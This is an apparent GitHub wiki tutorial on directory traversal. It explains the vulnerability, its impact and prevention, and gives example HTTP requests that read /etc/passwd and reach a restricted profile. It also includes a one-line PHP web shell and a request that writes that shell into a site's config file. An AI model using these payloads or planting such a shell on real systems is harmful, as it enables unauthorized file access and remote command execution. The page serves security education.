info ‐ Directory Traversal - taylorjohn/hacking GitHub Wiki

Directory Traversal (Path Traversal)

Directory traversal, also known as path traversal or directory climbing, is a prevalent web security vulnerability that enables attackers to access files and directories outside of the intended directory structure. Exploiting this vulnerability allows attackers to navigate through the file system to access sensitive files, execute arbitrary code, or modify application behavior. This wiki page provides an overview of directory traversal, its impact, common attack vectors, prevention techniques, and numerous examples with descriptions.

Description

Directory traversal occurs when attackers manipulate user input to traverse directories beyond the intended scope of the application. By exploiting inadequate input validation or improper handling of file paths, attackers can navigate to directories containing sensitive files or execute malicious code on the server.

Impact

Directory traversal vulnerabilities pose significant risks, including unauthorized access to sensitive files, disclosure of critical information, and execution of arbitrary code. The impact can range from data breaches and information leakage to complete compromise of the web application and server.

Common Attack Vectors

Attackers exploit directory traversal vulnerabilities through various attack vectors, including:

• HTTP requests
• File upload forms
• Parameters passed through URLs or input fields

Examples of Directory Traversal Attacks

1. Accessing Sensitive Files:

   • Description: Attackers attempt to access sensitive files, such as configuration files or password databases, by traversing the directory structure.
   • Example: Accessing /etc/passwd or /etc/shadow files on Unix-based systems.
   • Code Example (HTTP GET Request):

     GET /download?file=../../../../etc/passwd HTTP/1.1
     Host: example.com
     

2. Executing Arbitrary Code:

   • Description: Attackers upload malicious files to the server and use directory traversal to execute them, leading to remote code execution vulnerabilities.
   • Example: Uploading a PHP web shell and executing it via directory traversal.
   • Code Example (PHP Web Shell):

     <?php
     system($_GET['cmd']);
     ?>
     

     Usage: http://example.com/uploads/shell.php?cmd=ls

3. Reading or Writing Files:

   • Description: Attackers read or write files outside the intended directory structure, potentially modifying application behavior or injecting malicious content.
   • Example: Writing a malicious script into the web application's configuration file to execute arbitrary commands.
   • Code Example (File Write):

     POST /update-config HTTP/1.1
     Host: example.com
     Content-Type: application/x-www-form-urlencoded
     
     config_path=../../../../var/www/html/config.php&content=<?php system($_GET['cmd']); ?>
     

     Usage: http://example.com/config.php?cmd=ls

4. Bypassing Access Controls:

   • Description: Attackers bypass access controls by navigating to restricted directories or files.
   • Example: Accessing administrative files or user-specific data by traversing directories.
   • Code Example (Restricted Directory Access):

     GET /view-profile?user=../../../../admin/secret-profile HTTP/1.1
     Host: example.com
     

Protection and Prevention

Mitigating directory traversal vulnerabilities requires implementing proper input validation, output encoding, and access controls. Key preventive measures include:

• Input validation to sanitize user input
• Canonicalization techniques to convert user-supplied paths to absolute paths
• Proper file permissions to restrict access to sensitive files
• Deployment of Web Application Firewalls (WAFs) to detect and block malicious requests
• Regular security testing, including code reviews and penetration testing, to identify and remediate vulnerabilities

By addressing directory traversal vulnerabilities proactively, organizations can enhance the security of their web applications and protect against unauthorized access and data breaches.